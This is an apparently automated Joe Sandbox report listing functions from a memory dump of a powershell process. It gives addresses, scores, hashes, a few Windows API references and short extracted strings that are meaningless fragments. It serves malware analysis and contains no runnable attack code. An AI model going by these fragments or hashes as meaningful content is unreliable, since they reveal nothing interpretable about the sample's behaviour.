Opcode ID: 467cc0855e692c2dc5e5e94cc9aebb3b0cbb0d2a8434b5cd0941b1d0188ec625
Instruction ID: e3a9f8abb049faa5ccfcbc4548f2c306a8517300f2a34742b1d1dcab940d9e61
Opcode Fuzzy Hash: 467cc0855e692c2dc5e5e94cc9aebb3b0cbb0d2a8434b5cd0941b1d0188ec625
Instruction Fuzzy Hash: 8451F8B1D08B918FD700AB78948936EBFE0BF26314F048A3CD595876C5D3789458C792

Function 005159F0 Relevance: 8.9, Strings: 7, Instructions: 197COMMON

Download Yara Rule

Strings

'j7h, xrefs: 00516134
+r>p, xrefs: 0051614A
WY, xrefs: 00516260
>n<l, xrefs: 00516129
VT, xrefs: 00516255
VO, xrefs: 0051624A
2v6t, xrefs: 0051613F

Memory Dump Source

Source File: 00000008.00000002.4460827755.00000000004F1000.00000020.00000400.00020000.00000000.sdmp, Offset: 004F0000, based on PE: true

Associated: 00000008.00000002.4460787915.00000000004F0000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.4461817124.000000000052F000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.4461883407.0000000000532000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.4462000591.0000000000540000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_4f0000_powershell.jbxd

Similarity

API ID:
String ID: 'j7h$+r>p$2v6t$>n<l$VO$VT$WY
API String ID: 0-3758922207
Opcode ID: 2e87b9b9207bedf8b8c24dac86019e548294c9a59a189cc2f46d5a93a0c5517f
Instruction ID: a7d6387d870e453840ff1cc2b5f3386401738ae71f747f4e0375ed7d773ce94d
Opcode Fuzzy Hash: 2e87b9b9207bedf8b8c24dac86019e548294c9a59a189cc2f46d5a93a0c5517f
Instruction Fuzzy Hash: 4A618CB42083918BD7309F689812BABBBF0FF92314F041D2CD5D99B252D7788A55CB5B

Function 00515DD7 Relevance: 7.9, Strings: 6, Instructions: 430COMMON

Download Yara Rule

Strings

pW5C, xrefs: 00515E0A
6??5, xrefs: 00515E02
2OH:, xrefs: 00515DFA
>:<*, xrefs: 00516036
==Vg, xrefs: 00516046
v$%6, xrefs: 00515DF2

Memory Dump Source

Source File: 00000008.00000002.4460827755.00000000004F1000.00000020.00000400.00020000.00000000.sdmp, Offset: 004F0000, based on PE: true

Associated: 00000008.00000002.4460787915.00000000004F0000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.4461817124.000000000052F000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.4461883407.0000000000532000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.4462000591.0000000000540000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_4f0000_powershell.jbxd

Similarity

API ID:
String ID: 2OH:$6??5$==Vg$>:<*$pW5C$v$%6
API String ID: 0-1921259365
Opcode ID: 9b35105783de2356717e1e10648213c1e87992ee012df0f089e871f47f7e0671
Instruction ID: f3d85ff63567504d612b6fa4404110c2eed62ec5328978a973126f8d208d0d99
Opcode Fuzzy Hash: 9b35105783de2356717e1e10648213c1e87992ee012df0f089e871f47f7e0671
Instruction Fuzzy Hash: DED154B190C384DBD7049F24E8912ABBFE4BF96304F4849BDE5C28B351E339E9458B52

Function 004F9210 Relevance: 7.9, Strings: 6, Instructions: 357COMMON

Download Yara Rule

Strings

~~|x, xrefs: 004F958E
jN@|, xrefs: 004F9231
w, xrefs: 004F94E2
OvRY, xrefs: 004F9249
`ian, xrefs: 004F9259
B~{q, xrefs: 004F9241

Memory Dump Source

Source File: 00000008.00000002.4460827755.00000000004F1000.00000020.00000400.00020000.00000000.sdmp, Offset: 004F0000, based on PE: true

Associated: 00000008.00000002.4460787915.00000000004F0000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.4461817124.000000000052F000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.4461883407.0000000000532000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.4462000591.0000000000540000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_4f0000_powershell.jbxd

Similarity

API ID:
String ID: B~{q$OvRY$`ian$jN@|$w$~~|x
API String ID: 0-325120139
Opcode ID: a22bad063c165d0bd93474fcd8c7372986f21cf75cb7bb9ce54dbef89405fceb
Instruction ID: 69549364bea0018fc000575a13cb56d5db9955f1784fa68ba1b13e0a0db871b7
Opcode Fuzzy Hash: a22bad063c165d0bd93474fcd8c7372986f21cf75cb7bb9ce54dbef89405fceb
Instruction Fuzzy Hash: EBA1167164C3858BC316CF6984A076BFFE1AFE7344F08496DE5C54B382D279890ACB96

Function 004F8F60 Relevance: 6.5, Strings: 5, Instructions: 272COMMON

Download Yara Rule

Strings

J6\0, xrefs: 004F904F
|jRl, xrefs: 004F8FDA
P[, xrefs: 004F8FE2
[R, xrefs: 004F905F
MIA, xrefs: 004F9047

Memory Dump Source

Source File: 00000008.00000002.4460827755.00000000004F1000.00000020.00000400.00020000.00000000.sdmp, Offset: 004F0000, based on PE: true

Associated: 00000008.00000002.4460787915.00000000004F0000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.4461817124.000000000052F000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.4461883407.0000000000532000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.4462000591.0000000000540000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_4f0000_powershell.jbxd

Similarity

API ID:
String ID: J6\0$MIA$P[$[R$|jRl
API String ID: 0-4039841171
Opcode ID: d6d94da02e8cd90508f8c5309ad9ffaf61e439cbbe2c4c0beee08b07978d7d82
Instruction ID: fb4f183841528b28f69e7c4f423a14482d1b9a41c2764bb0485e797ba80fd3eb
Opcode Fuzzy Hash: d6d94da02e8cd90508f8c5309ad9ffaf61e439cbbe2c4c0beee08b07978d7d82
Instruction Fuzzy Hash: 287128615083968BD7158F39845437BFFE19FA3204F0885BEE5E69B382D32DCD0A8766

Function 005184DF Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 203COMMON

Download Yara Rule

APIs

RtlExpandEnvironmentStrings.NTDLL(00000000,?,0000001F,00000000,00000000,?), ref: 005185BC
RtlExpandEnvironmentStrings.NTDLL(00000000,?,0000001F,00000000,00000000,?), ref: 005186FF

Strings

XY^, xrefs: 005186A7

Memory Dump Source

Source File: 00000008.00000002.4460827755.00000000004F1000.00000020.00000400.00020000.00000000.sdmp, Offset: 004F0000, based on PE: true

Associated: 00000008.00000002.4460787915.00000000004F0000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.4461817124.000000000052F000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.4461883407.0000000000532000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.4462000591.0000000000540000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_4f0000_powershell.jbxd

Similarity

API ID: EnvironmentExpandStrings
String ID: XY^
API String ID: 237503144-2925192336
Opcode ID: 587443d7113d404e3dbb98eba594c85c9a07fad2d16b944c8a05acc206b3acae
Instruction ID: 85c0e60ac02ce1535aea6620f7aab1eea91e4dbfbcbe559d7c68045a086cd30d
Opcode Fuzzy Hash: 587443d7113d404e3dbb98eba594c85c9a07fad2d16b944c8a05acc206b3acae
Instruction Fuzzy Hash: B26122F1A042119FD354CF69C892B96BFB2FB45304F2680ADD5069F3A6CB758842CBC5

Function 004FA8B0 Relevance: 5.4, Strings: 4, Instructions: 394COMMON

Download Yara Rule

Strings

EZSM, xrefs: 004FABB0
EZSM, xrefs: 004FAD0C, 004FAD5F, 004FAD2D, 004FAB85, 004FAD24, 004FAB54
")*+, xrefs: 004FAA02
IK, xrefs: 004FA9C2

Memory Dump Source

Source File: 00000008.00000002.4460827755.00000000004F1000.00000020.00000400.00020000.00000000.sdmp, Offset: 004F0000, based on PE: true

Associated: 00000008.00000002.4460787915.00000000004F0000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.4461817124.000000000052F000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.4461883407.0000000000532000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.4462000591.0000000000540000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_4f0000_powershell.jbxd

Similarity

API ID:
String ID: ")*+$EZSM$EZSM$IK
API String ID: 0-2209472741
Opcode ID: 2374851c3c1bf3c44df29401ed7b1d39e7f5be968b2162de2f37f1b32f1798bc
Instruction ID: db928f52909d46ae7ff464aaa6fb443fbdbe4c6f9bafaea7e60e85fd86178fd7
Opcode Fuzzy Hash: 2374851c3c1bf3c44df29401ed7b1d39e7f5be968b2162de2f37f1b32f1798bc
Instruction Fuzzy Hash: 9CD128B16083588BC314DF24C8512ABBBE3ABC1305F18892DE5D98F356D679C919C78B

Function 005221CA Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 99COMMON

Download Yara Rule

APIs

GetSystemMetrics.USER32 ref: 00522204
GetSystemMetrics.USER32 ref: 00522213

Strings

, xrefs: 005222EA

Memory Dump Source

Source File: 00000008.00000002.4460827755.00000000004F1000.00000020.00000400.00020000.00000000.sdmp, Offset: 004F0000, based on PE: true

Associated: 00000008.00000002.4460787915.00000000004F0000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.4461817124.000000000052F000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.4461883407.0000000000532000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.4462000591.0000000000540000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_4f0000_powershell.jbxd

Similarity

API ID: MetricsSystem
String ID:
API String ID: 4116985748-3916222277
Opcode ID: e5b1c4ad6f6a1e61ce263cfb7984e2df4e22f4a1fc3cd3e463386aa6d0f63735
Instruction ID: bad20537356236b6d087dd1f06e7e84e360c88346cc374f36db86a38aab22b01
Opcode Fuzzy Hash: e5b1c4ad6f6a1e61ce263cfb7984e2df4e22f4a1fc3cd3e463386aa6d0f63735
Instruction Fuzzy Hash: 824184B0D142198FCB40EFACE99569DBBF0BB88304F10956EE498E7354D734A948CF92

Function 00513011 Relevance: 5.2, Strings: 4, Instructions: 184COMMON

Download Yara Rule

Strings

CONM, xrefs: 00514652
n\]^, xrefs: 005146CE, 005146DF
ZG@R, xrefs: 00514637
^WWM, xrefs: 0051463F

Memory Dump Source

Source File: 00000008.00000002.4460827755.00000000004F1000.00000020.00000400.00020000.00000000.sdmp, Offset: 004F0000, based on PE: true

Associated: 00000008.00000002.4460787915.00000000004F0000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.4461817124.000000000052F000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.4461883407.0000000000532000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.4462000591.0000000000540000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_4f0000_powershell.jbxd

Similarity

API ID:
String ID: CONM$ZG@R$^WWM$n\]^
API String ID: 0-2610027754
Opcode ID: 591ffc7b09c35e483fb464b544dbfdc0dae8d1493b2e166ea01d12a762078980
Instruction ID: 2691b79fe1c8cdc0dafb9a6349205300b42376b5943b6f76b56cc41ac26f0860
Opcode Fuzzy Hash: 591ffc7b09c35e483fb464b544dbfdc0dae8d1493b2e166ea01d12a762078980
Instruction Fuzzy Hash: 415148B5A0C3458BE730CE6484813EBBBE2FF51344F15992ED5D587341E238D985DB92

Function 00505E4D Relevance: 4.7, Strings: 3, Instructions: 959COMMON

Download Yara Rule

Strings

Q-=5, xrefs: 005066A6, 00506695
Q-=5, xrefs: 005065F0, 00506629, 00506543, 00506547
C, xrefs: 005065E2

Memory Dump Source

Source File: 00000008.00000002.4460827755.00000000004F1000.00000020.00000400.00020000.00000000.sdmp, Offset: 004F0000, based on PE: true

Associated: 00000008.00000002.4460787915.00000000004F0000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.4461817124.000000000052F000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.4461883407.0000000000532000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.4462000591.0000000000540000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_4f0000_powershell.jbxd

Similarity

API ID: InitializeThunk
String ID: C$Q-=5$Q-=5
API String ID: 2994545307-3019679163
Opcode ID: 8323e3f2af8a14b33578934f2c7b5e7995ec5c4fb0ff124f198ba291b76feebd
Instruction ID: 7f4f45bc24317ec6724eb95d31fd5cb7e902079d4d809b7bf6f72f47661b026a
Opcode Fuzzy Hash: 8323e3f2af8a14b33578934f2c7b5e7995ec5c4fb0ff124f198ba291b76feebd
Instruction Fuzzy Hash: A8325A725083518FD7248F28DC9067FBBE2FFDA315F19896CE5C2872A2D6349906CB91

Function 0050F8F0 Relevance: 4.2, Strings: 3, Instructions: 434COMMON

Download Yara Rule

Strings

E?C9, xrefs: 0050FAAF
VJ, xrefs: 0050FD0A
A;45, xrefs: 0050FAB7

Memory Dump Source

Source File: 00000008.00000002.4460827755.00000000004F1000.00000020.00000400.00020000.00000000.sdmp, Offset: 004F0000, based on PE: true

Associated: 00000008.00000002.4460787915.00000000004F0000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.4461817124.000000000052F000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.4461883407.0000000000532000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.4462000591.0000000000540000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_4f0000_powershell.jbxd

Similarity

API ID:
String ID: A;45$E?C9$VJ
API String ID: 0-2546191082
Opcode ID: e7cbe2a2fa0db5ee3342a7a3e82ca1a9f795faff59a93a0ff2e1d81171dec1bc
Instruction ID: 8b90b680228326a86578373c6505e5b58677fbcc9a7a70394af84eba9b94a5cf
Opcode Fuzzy Hash: e7cbe2a2fa0db5ee3342a7a3e82ca1a9f795faff59a93a0ff2e1d81171dec1bc
Instruction Fuzzy Hash: 14C1C1B15183108BD724DF24C86276BBBF1FFD5750F088A2CE8968B7A4E7799801CB52

Function 004F95D0 Relevance: 4.1, Strings: 3, Instructions: 389COMMON

Download Yara Rule

Strings

36058DC784D611A1962CEBBDF1A894EB, xrefs: 004F96CB
<, xrefs: 004F9846
], xrefs: 004F9798

Memory Dump Source

Source File: 00000008.00000002.4460827755.00000000004F1000.00000020.00000400.00020000.00000000.sdmp, Offset: 004F0000, based on PE: true

Associated: 00000008.00000002.4460787915.00000000004F0000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.4461817124.000000000052F000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.4461883407.0000000000532000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.4462000591.0000000000540000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_4f0000_powershell.jbxd

Similarity

API ID:
String ID: 36058DC784D611A1962CEBBDF1A894EB$<$]
API String ID: 0-2827881798
Opcode ID: 4cc38ef61de487f7e9678722fcb822fe70a8f8e99d5e8df3bf0753058aab7a82
Instruction ID: f7f4a83a4449c6ae8dd575221eb0acbba89cccc63071f0af6efb92a29f8ee9ca
Opcode Fuzzy Hash: 4cc38ef61de487f7e9678722fcb822fe70a8f8e99d5e8df3bf0753058aab7a82
Instruction Fuzzy Hash: B9C113B160C3448BE718DF65C89177FBBE2EB82314F14492DE5D58B391DA38C90ACB5A

Function 00517560 Relevance: 4.0, Strings: 3, Instructions: 261COMMON

Download Yara Rule

Strings

flfc, xrefs: 00517604
ndnk, xrefs: 00517612
6|tx, xrefs: 0051760B

Memory Dump Source

Source File: 00000008.00000002.4460827755.00000000004F1000.00000020.00000400.00020000.00000000.sdmp, Offset: 004F0000, based on PE: true

Associated: 00000008.00000002.4460787915.00000000004F0000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.4461817124.000000000052F000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.4461883407.0000000000532000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.4462000591.0000000000540000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_4f0000_powershell.jbxd

Similarity

API ID:
String ID: 6|tx$flfc$ndnk
API String ID: 0-3367617581
Opcode ID: 73a2c750a5ab461c6b34d52c3d7fced69f80920193fe15c97b9060d034f11a94
Instruction ID: 4cad303eab1afa2ce9effc4541a77e14d2937c09ea3d0217f597d6d4b93b1d96
Opcode Fuzzy Hash: 73a2c750a5ab461c6b34d52c3d7fced69f80920193fe15c97b9060d034f11a94
Instruction Fuzzy Hash: 7B816AB5C0460ACFDB108F68EC9167EBBB0FF5A314F044168E811AB3A2E734A851CF90

Function 00515AE5 Relevance: 2.9, Strings: 2, Instructions: 402COMMON

Download Yara Rule

Strings

==Vg, xrefs: 00516046
>:<*, xrefs: 00516036

Memory Dump Source

Source File: 00000008.00000002.4460827755.00000000004F1000.00000020.00000400.00020000.00000000.sdmp, Offset: 004F0000, based on PE: true

Associated: 00000008.00000002.4460787915.00000000004F0000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.4461817124.000000000052F000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.4461883407.0000000000532000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.4462000591.0000000000540000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_4f0000_powershell.jbxd

Similarity

API ID:
String ID: ==Vg$>:<*
API String ID: 0-3611967697
Opcode ID: 3b416a3f6b731d6a3d2cded67b9979dc33f0a1d58cb7d9b688c72e06725abbd4
Instruction ID: ddce4ca554ecd36a54f1432424b5c29112341b39090c9dd0f8e5d21e5c512722
Opcode Fuzzy Hash: 3b416a3f6b731d6a3d2cded67b9979dc33f0a1d58cb7d9b688c72e06725abbd4
Instruction Fuzzy Hash: 49C156B150C344CBD7049F24AC912BBBBE4BF96304F5848BDE5C28B351E339EA498B52

Function 0052AE2E Relevance: 2.7, Strings: 2, Instructions: 221COMMON

Download Yara Rule

Strings

&7, xrefs: 0052B053
J9&, xrefs: 0052AEF4

Memory Dump Source

Source File: 00000008.00000002.4460827755.00000000004F1000.00000020.00000400.00020000.00000000.sdmp, Offset: 004F0000, based on PE: true

Associated: 00000008.00000002.4460787915.00000000004F0000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.4461817124.000000000052F000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.4461883407.0000000000532000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.4462000591.0000000000540000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_4f0000_powershell.jbxd

Similarity

API ID:
String ID: &7$J9&
API String ID: 0-952755115
Opcode ID: a4653a8d410ad82a1b3f8114747008022ae784bc05dddb28f48bc60ec54f7a10
Instruction ID: df7a874ed99b98487a91c2724c417da4badc46647e713ae07bd8d47f8a24e098
Opcode Fuzzy Hash: a4653a8d410ad82a1b3f8114747008022ae784bc05dddb28f48bc60ec54f7a10
Instruction Fuzzy Hash: CB515277A493104BD718DF796D4210BBFE2AED6218F2EC93CE4C997352EA3884068742

Function 005147B0 Relevance: 2.7, Strings: 2, Instructions: 220COMMON

Download Yara Rule

Strings

{}, xrefs: 005148AE
N, xrefs: 005148B6

Memory Dump Source

Source File: 00000008.00000002.4460827755.00000000004F1000.00000020.00000400.00020000.00000000.sdmp, Offset: 004F0000, based on PE: true

Associated: 00000008.00000002.4460787915.00000000004F0000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.4461817124.000000000052F000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.4461883407.0000000000532000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.4462000591.0000000000540000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_4f0000_powershell.jbxd

Similarity

API ID:
String ID: N${}
API String ID: 0-601268450
Opcode ID: ddc733091bcf54132d8d129ab6869ddf4005bd704a619f535216f5cba75c4c88
Instruction ID: 0455cdfef6e846657627e348a3b9a26eca83351276ae4727214b8b568474fca1
Opcode Fuzzy Hash: ddc733091bcf54132d8d129ab6869ddf4005bd704a619f535216f5cba75c4c88
Instruction Fuzzy Hash: A66134B59083048BD710DF24D8916ABBBF1FFD2354F08992CE8C59B391E7788945CB92

Function 00518751 Relevance: 2.2, APIs: 1, Instructions: 729COMMON

Download Yara Rule

APIs

RtlExpandEnvironmentStrings.NTDLL(00000000,?,0000001F,00000000,?,?), ref: 0051878C

Memory Dump Source

Source File: 00000008.00000002.4460827755.00000000004F1000.00000020.00000400.00020000.00000000.sdmp, Offset: 004F0000, based on PE: true

Associated: 00000008.00000002.4460787915.00000000004F0000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.4461817124.000000000052F000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.4461883407.0000000000532000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.4462000591.0000000000540000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_4f0000_powershell.jbxd

Similarity

API ID: EnvironmentExpandStrings
String ID:
API String ID: 237503144-0
Opcode ID: fe134776ee8671548cb461ad7626ed82f9e496928b8eb37b71d19be4a68128d8
Instruction ID: 66c255af03b77a1bc46887da2de438ac82a454cd754c3f9b0c80ef15fae56b40
Opcode Fuzzy Hash: fe134776ee8671548cb461ad7626ed82f9e496928b8eb37b71d19be4a68128d8
Instruction Fuzzy Hash: CB224771E04215DFEB14CFA8EC816BE7BB2BF59310F184568E512AB392CB356D45CBA0

Function 0052A120 Relevance: 1.9, Strings: 1, Instructions: 666COMMON

Download Yara Rule

Strings

f, xrefs: 0052A341

Memory Dump Source

Source File: 00000008.00000002.4460827755.00000000004F1000.00000020.00000400.00020000.00000000.sdmp, Offset: 004F0000, based on PE: true

Associated: 00000008.00000002.4460787915.00000000004F0000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.4461817124.000000000052F000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.4461883407.0000000000532000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.4462000591.0000000000540000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_4f0000_powershell.jbxd

Similarity

API ID: InitializeThunk
String ID: f
API String ID: 2994545307-1993550816
Opcode ID: 9101cae2479f6d97a05a68ae13ded138acdcdce693d70019a90d0eb9f6893636
Instruction ID: 87755969343aaaff39a1197b294bc4d9784c3bc24ca3d1e841c45a38590f540c
Opcode Fuzzy Hash: 9101cae2479f6d97a05a68ae13ded138acdcdce693d70019a90d0eb9f6893636
Instruction Fuzzy Hash: 3012C0716083518FD714CF28E890A2BBBE1FF9A314F284A2CE495972E1D771E845DB92

Function 005197E0 Relevance: 1.7, Strings: 1, Instructions: 408COMMON

Download Yara Rule

Strings

", xrefs: 00519AC8

Memory Dump Source

Source File: 00000008.00000002.4460827755.00000000004F1000.00000020.00000400.00020000.00000000.sdmp, Offset: 004F0000, based on PE: true

Associated: 00000008.00000002.4460787915.00000000004F0000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.4461817124.000000000052F000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.4461883407.0000000000532000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.4462000591.0000000000540000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_4f0000_powershell.jbxd

Similarity

API ID:
String ID: "
API String ID: 0-123907689
Opcode ID: f61a6243f4cbaaea40e29a2da2abc90fb35a9a8f0511b884f7581cc5ca6e41bf
Instruction ID: d0e5e262cca7ef924d937533589335e5f70c2efdc534d6c0377277822007d5ae
Opcode Fuzzy Hash: f61a6243f4cbaaea40e29a2da2abc90fb35a9a8f0511b884f7581cc5ca6e41bf
Instruction Fuzzy Hash: 40D1F472A083159FE714DE2494A07EBBBEABFC5314F08892DE89987281E734DD84C7D1

Function 004FBAEE Relevance: 1.4, Strings: 1, Instructions: 119COMMON

Download Yara Rule

Strings

', xrefs: 004FBB06

Memory Dump Source

Source File: 00000008.00000002.4460827755.00000000004F1000.00000020.00000400.00020000.00000000.sdmp, Offset: 004F0000, based on PE: true

Associated: 00000008.00000002.4460787915.00000000004F0000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.4461817124.000000000052F000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.4461883407.0000000000532000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.4462000591.0000000000540000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_4f0000_powershell.jbxd

Similarity

API ID:
String ID: '
API String ID: 0-2503692993
Opcode ID: f9ec4f7172da01c56efe9f0694eb0b4466e5a69080d068201c1168f78f0f33f0
Instruction ID: 8b75db673a351d0d130f7be7c8f92a774a012efde214908f79c22e6fb553abd5
Opcode Fuzzy Hash: f9ec4f7172da01c56efe9f0694eb0b4466e5a69080d068201c1168f78f0f33f0
Instruction Fuzzy Hash: 0931257540C3498BC708CF10DC505BBB7E0EF96308F549A5DE99A97361E338DA46CB8A

Function 0052D6F0 Relevance: 1.3, Strings: 1, Instructions: 98COMMON

Download Yara Rule

Strings

@, xrefs: 0052D75D

Memory Dump Source

Source File: 00000008.00000002.4460827755.00000000004F1000.00000020.00000400.00020000.00000000.sdmp, Offset: 004F0000, based on PE: true

Associated: 00000008.00000002.4460787915.00000000004F0000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.4461817124.000000000052F000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.4461883407.0000000000532000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.4462000591.0000000000540000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_4f0000_powershell.jbxd

Similarity

API ID: InitializeThunk
String ID: @
API String ID: 2994545307-2766056989
Opcode ID: fa93da8d40e58594136383875233949d85015b27729adf55bbea0a73edbf549b
Instruction ID: 5dd66e43bbf45f8ce62244cd2ad1b2c8cde89af064742749e1202ad73f2c1eee
Opcode Fuzzy Hash: fa93da8d40e58594136383875233949d85015b27729adf55bbea0a73edbf549b
Instruction Fuzzy Hash: 6831F5715083049BC314DF68E8C166BBBF5FF9A314F14892CE69983391D3359908CBA2

Function 0052CDA0 Relevance: .7, Instructions: 675COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.4460827755.00000000004F1000.00000020.00000400.00020000.00000000.sdmp, Offset: 004F0000, based on PE: true

Associated: 00000008.00000002.4460787915.00000000004F0000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.4461817124.000000000052F000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.4461883407.0000000000532000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.4462000591.0000000000540000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_4f0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8275701c67ffcdef42314cf6aac8146e3a3a9fb9feff6f897104d6e0b4cef448
Instruction ID: 8b3305b9be33f65fa460ae0e37f25638276775a6b2412b097739fe2e576dd1dd
Opcode Fuzzy Hash: 8275701c67ffcdef42314cf6aac8146e3a3a9fb9feff6f897104d6e0b4cef448
Instruction Fuzzy Hash: 67221176A08225CFC718CF68E89056ABBF2FF9E315F0984ADD58697391D730A805DB90

Function 004F7410 Relevance: .7, Instructions: 660COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.4460827755.00000000004F1000.00000020.00000400.00020000.00000000.sdmp, Offset: 004F0000, based on PE: true

Associated: 00000008.00000002.4460787915.00000000004F0000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.4461817124.000000000052F000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.4461883407.0000000000532000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.4462000591.0000000000540000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

